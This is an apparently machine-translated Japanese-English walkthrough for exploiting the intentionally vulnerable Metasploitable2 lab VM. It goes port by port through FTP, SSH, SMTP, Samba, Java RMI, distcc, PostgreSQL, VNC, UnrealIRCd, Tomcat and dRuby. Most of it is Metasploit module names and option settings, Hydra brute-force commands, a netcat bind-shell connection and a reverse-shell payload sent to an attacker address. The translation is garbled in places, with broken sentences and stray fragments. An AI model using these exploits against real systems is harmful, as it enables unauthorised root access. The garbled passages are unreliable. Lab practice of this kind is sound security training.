- Metasploitable2 Complete Overview
- 異なる手法ですべてのポートを探索する.でスキャン開始しましょう。
- 22-…SSH
- 23-TELNET
- 25-SMTP
- 方法2
- 139&445 Netbios-SSN
- 1099-Java->
- Exploiting java-RMI-server
- 1524-BINDSHELL
- 2121-ProFTPD
- 3306-MYSQL
- 3632-DISTCCD
- Exploiting port 3632 using distcc- 3632-DISTCCD
- postgre_payloadでPostgreSQLを探る
- 5900-VNC
- 6000-X11
- Exploiting port 6000 using ssh
- 6667 & 6697 UnrealIRCD
- 方法1: ポート 6667
- Method 2: ポート6697
- 8180-TOMCAT
- Exploiting Apache-Tomcat
- 87-Ruby-drb
Metasploitable2 Complete Overview
Metasploitable は意図的に脆弱な Linux 仮想マシンです。
この VM はセキュリティ トレーニング、テスト セキュリティ ツール、共通の侵入テスト技術の練習に使用することができます。
インストールと設定
私たちはここで Metasploitable 2 (侵入テスト用のくそ脆弱なマシン)を悪用します
この Metasploiable2 マシンは https://information.rapid7.com/download-metasploitable-2017.html
インストールプロセスから取得します。
- VirtualBox を開き、”New” ボタンをクリックして新しい仮想マシンを作成します
- Virtual Machine name (Metasploitable2)
- Allocated amount of memory (preferably but not under 512mb)
- 既存のハードディスクファイルを使用します
- Rapid7 からダウンロードしてきた vmdk file
- 作成をクリックします…
- vmdk file (既存ハードディスクファイルを使用します)を選択し、仮想マシンを作成します。!!! Metasploitable2のインストールが完了したら、ネットワーク設定を行います。 設定/ネットワーク/アダプター イーサネットまたはワイヤレス
- 今回はポートを6697
詳細設定タブで、選択します。 Promiscuous Mode を Allow All
Metasploitable2 マシンを起動し、バナー上で与えられた認証情報でログインしてみる…!!!!
異なる手法ですべてのポートを探索する.でスキャン開始しましょう。
方法 1:
ユーザー名として匿名、パスワードなしでログインします。
匿名 FTP についてより詳細な情報が必要な場合は、こちらを参照してください。
https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol
ftp 192.168.0.130
方法 2 :
Hydra による強引な方法ですが、ユーザー名とパスワードをカスタムリストにしていることが必要です。
hydra -L /root/Desktop/USERNAMES.txt -P /root/Desktop/PASSWORDS.txt <Target IP Address> ftp -V
与えられたファイルから各ユーザー名とパスワードを取って、ターゲット FTP サービスにログインしようと試みます。
認証情報が見つかったら、直接ログインできます。
ユーザー アカウントにログイン後、特権を昇格してルートアクセスを取得できます。
方法3 :
メタスプロイト フレームワークを使用して FTP を悪用する
メタスプロイト フレームワーク コンソールを開き、vsftpd Backdoor exploit
msfconsole
Search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoorを検索する。
show options
set RHOSTS 192.168.0.130 --> <target IP address>exploit
おめでとう、あなたはルートアクセスを得た
22-…SSH
Secure Shell (SSH) は、セキュリティで保護されていないネットワーク上で安全にネットワークサービスを操作するための暗号ネットワークプロトコルです。
Exploiting SSH in Different Techniques
Method 1
Cracking Username and password with Hydra
Hydra is an built-in tool in Kali-Linux used to Brute force attack is a trial and error method used by application program to decode encrypted data such as password or Data Encryption Standard (DES) keys, instead on employs the intellectual strategies (using brute force)(パスワードなどの暗証データを読み込むために、アプリケーションが徹底した努力を行って、知的戦略を用いるのではなく、力ずくで行う方法).
hydra -L <Usernames_List> -P <Passwords_List> <Target ip address> <Service>
方法2
Metasploitフレームワークを開く
ターミナルを開いて以下のコマンドを入力してください:
service postgresql startmsfconsolesearch ssh_loginuse auxiliary/scanner/ssh/ssh_login
set this auxiliary and see what it requires.
set RHOSTS <target IP Address> --> in my case 192.168.0.130
Set predefined Usernames list and Passwords List
set USER_FILE <Username file Path>set PASS_FILE <Password file Path>exploit
It will take time-based your usernames and passwords List and It will notify with username: password and login with those credentials.これは、ユーザー名とパスワードリストを設定し、これらの証明書でログインします。
ssh username@targetipaddress
あなたはユーザー権限を持っていますが、すべてのタスクを実行できないので権限昇格を行ってルート権限を取得しようとします。
23-TELNET
Telnet は、インターネットのような TCP/IP ネットワーク上でリモート コンピュータにアクセスするために使用される、シンプルでテキスト ベースのネットワーク プロトコルです。 Telnet は 1969 年に作成され、開始されました。歴史的に見れば、それが最初のインターネットであると言うことができます。
25-SMTP
SMTP は、TCP/IP プロトコルのアプリケーション層に含まれています。 保存と転送」と呼ばれるプロセスを使用して、SMTP は電子メールをネットワーク上およびネットワーク間で移動します。 SMTPは、メール転送エージェント(MTA)と呼ばれるものと密接に連携し、通信を適切なコンピュータとメール受信箱に送信します。
方法1:
Metasploitを使用する
コマンドを実行してMetasploitを起動する
service postgresql startmsfconsole -qsearch smtp_version
use auxiliary/scanning/smtp/smtp_version (or) you can type use 0show optionsset RHOST 192.168.0.130exploit (or) runshow optionsset RHOST 192.168.0.130exploit (or) run
SMTP とは Simple Mail Transport Protocol の略でサーバーからサーバーへの転送プロトコルです。を使用し、電子メールの送受信を行うユーザーのローカルデータベースを保持するプロトコルです。
SMTP にはコマンド群があります。 25番ポートから「netcat」でターゲットに接続し、このデータベースのメールを取得することを試みます。
新しいターミナルを開き、次のように入力します。
nc 192.168.0.130 25
これで接続は確立しましたので、SMTPコマンド
Type: vrfy user
vrfy (これは非同期式)で確認することができます。インタラクティブシェル)
SMTPコマンドはこちらへどうぞ。 http://www.tcpipguide.com/free/t_SMTPCommands-2.htm
方法2
Using smtp_enum
これは Metasploit
search smtp_enum
によって行うことができる。
use auxiliary/scanner/smtp/smtp_enum
show optionsset RHOST 192.168.0.130exploit
この方法はSMTPサービスにおけるユーザーのこのリストを見つけるために列挙を使用しています。
後に NetCat はそのユーザーとの逆接続を得るのに役立ちます。
139&445 Netbios-SSN
Sambaはオープンソースプロジェクトで、LinuxやUnixコンピューターで広く使われており、Windowsファイルやプリントサービスを使用することが可能です。
エクスプロイトの検索
use exploit/multi/samba/usermap_script
Exploit のオプションを表示するには
show optionsSet RHOST192.168.0.130 (Target IP address)
ペイロードを設定する
Show payloadsSet payload cmd/unix/reverse
Payloadに必須の引数を設定する
。
Show optionsSet LHOST 192.168.0.109 (Attackers IP Address)Set LPORT 4444
すべての必須引数が満たされたらチェック
exploit
1099-Java->
Remote Method Invocation (RMI) は、あるオブジェクトが別のアドレス空間に存在するオブジェクトのメソッドを呼び出すことができるAPIである。 同じマシンかリモートマシンにある可能性があります。
Exploiting java-RMI-server
search for the exploit
search java_rmi_server
exploitをそのランクにより選択。例えば、「excellent」は「normal」よりも効果的です。
use exploit/multi/misc/java_rmi_servershow optionsset RHOSTS <target's IP>exploit
対象マシンにアクセスできた。
1524-BINDSHELL
Bind shellとはシェル型の一つで、対象マシンから通信ポートまたは被害マシン上のリスナーをオープンして着信待ちをするものです。 攻撃者は、被害者マシンのリスナーに接続し、サーバー上でコードまたはコマンドの実行につなげます。
nc <target ip address> 1524
Congratulations, You are a root user now.
2121-ProFTPD
このポートを悪用する前に、ブルートフォース技術でそれを取得する方法を知っているので、ログイン資格情報を持っている必要がある、我々はtelnetでProFTPdにアクセスできます、ここではユーザー:ユーザーを使っています。
telnet <Taget IP Address> <Port Number>USER <username>
PASS <password>これは通常のユーザーです。
3306-MYSQL
方法1:
search for the exploit
search scanner/mysql/mysql_login
use auxiliary/scanner/mysql/mysql_login
MySQLのパスワードが空白の場合があります。
注意: デフォルトでは、BLANK_PASSWORDS は false と表示されるので、それを true に設定します。
set BLANK_PASSWORDS as true
Method:2
この方法では、ユーザー名を root、ターゲットIPを指定してこのコマンドで MySQL を悪用しようとするものである。
mysql -u root -h <target's IP>
3632-DISTCCD
Distcc はコンピュータ ネットワーク上の分散コンピューティングを使用してソースコードのコンパイルを高速化するためのツールです。 正しい設定により、
distcc はプロジェクトのコンパイル時間を劇的に短縮することが可能です
Exploiting port 3632 using distcc-
3632-DISTCCD
Distcc- Distcc-
msfconsole を開いて distcc_exec を検索
search distcc_execshow options
必要な引数を設定して悪用
set RHOSTS <target-ip>exploit
Shell Access を取得しました…」。より高い権限を得るために権限昇格を試みる
postgre_payloadでPostgreSQLを探る
msfconsoleを開く & search for postgres_payload
。
search postgres_payloaduse exploit/linux/postgres/postgres_payloadshow options
Set required arguments for exploit
set RHOSTS <target-ip>
By default, ユーザー名をpostgresとします
exploit
Successfully logged in postgresql…。もっといろいろできるようにシェルを取得しよう…
privilege escalationをやってみよう…Happy learningです。.!!!
5900-VNC
msfconsole を開き、exploit vnc_login
search vnc_loginuse auxiliary/scanner/vnc/vnc_login
show optionsset RHOSTS <targets IP>set PASS_FILE <filepath that contains passwords>run (or) exploit
を検索してください。この方法は、Linux または Unix または Windows オペレーティング システムでホストされている VNC ソフトウェアに認証の脆弱性があることを利用するために使用されます。
そのパスワードでvnc接続を試みる
ターミナルでVncビューアを開く&IPアドレスを入力し接続
ログインプロンプトがポップアップ表示される。 と表示され、認証情報の入力を求められます
そこでパスワードを入力しOKボタンをクリックしてください。
Voilaaa…!!!You got Access…I know what are you thinking right Now… Don’t mess with the things around…..Happy Learning.
6000-X11
Xウィンドウシステム(別名X)は、ビットマップディスプレイのためのウィンドウシステムで、UNIXベースのオペレーティングシステムで一般的なものである。 X は GUI ベースの環境のための基本的なフレームワークを提供します。
リモート X11 サーバは、インターネット接続が可能な場所ならどこからでも接続を受け付けます。 これは、コンピュータまたはワイヤレスデバイスのグラフィックカード、入力デバイス、およびディスプレイ画面へのアクセスを担当する。
Exploiting port 6000 using ssh
ssh -X -l msfadmin 192.168.0.122
上記のコマンドでは ‘X’ がすべてのポート転送を有効にしています。 ユーザー名とターゲットの IP を指定することで、シェル
6667 & 6697 UnrealIRCD
UnrealIRCd はオープンソース IRC サーバで 1999 年から多くのネットワークに提供されているものです。 Linux、OS X、および Windows で動作します
UnrealIRCd は、モジュール性、高度な設定可能な設定ファイルに重点を置いた、高度な IRCd です。 主な機能としては、SSL
UnrealIRCd は、最も人気のあるフル機能の IRC デーモンの 1 つで、最も多くの IRC サーバーで使用されています
このサーバーは、おそらくあらゆる IRC サーバーの中で最もセキュリティ機能を備えていると言われています
使用されるプロトコル。 Internet Relay Chat
Let’s Exploit this IRC Server.
方法1: ポート 6667
search unrealircduse exploit/unix/irc/unreal_ircd_3281_backdoorshow options
exploit
set RHOSTS <target-ip>
の必須引数をセットする。
デフォルトでは、6667のポート番号がexploit
run (or) exploit
Heyyyy….ルートを確保した…ギリギリのところで生きている…
Method 2: ポート6697
上記の悪用と必要な引数を設定する
set RHOSTS <target-ip>set RPORT 6697
そして二度目のルート獲得…。8114>
8180-TOMCAT
Apache Tomcat は、Java Servlet、JavaServer Pages、Java Expression Language、および WebSocket 技術のオープンソースの実装です。 Tomcatは、Javaコードが実行可能な「ピュアJava」HTTP Webサーバ環境を提供します。
Exploiting Apache-Tomcat
それは2つのステップで完了できます。
Open msfconsole & search for tomcat_mgr_login
search tomcat_mgr_loginset RHOSTS <target-ip>
show options
搾取はデフォルトユーザー名を&パスワードリストを割り当てています。 exploitに引数を設定した後 exploitを入力(または)実行
同じユーザー名とパスワードを取って次の exploit に渡します。
search for tomcat Manager exploits
search tomcat_mgr_uploaduse exploit/multi/http/tomcat_mgr_uploadshow options
RHOSTS, RPORTとtomcat login exploitから得たHttpPassword、HttpUsernameを設定し、exprokeitを実行します。
msfconsole は exploit に適した payload を指定できるため meterpreter…
87-Ruby-drb
dRuby とは ruby 用分散オブジェクトシステムであり、ruby を使用することができます。 純粋なRubyで書かれており、そのプロトコルを使用します。
TCPソケットのような、Rubyランタイムが提供する以上のアドオンサービスは必要ありません。
search drb_remote_codeexec
必要な引数を設定する
show optionsset RHOSTS <target-ip>exploit (or) run
おめでとう、あなたは root シェルアクセスを取得しました.いくつかのシェルコマンドを使ってみてください(8114>)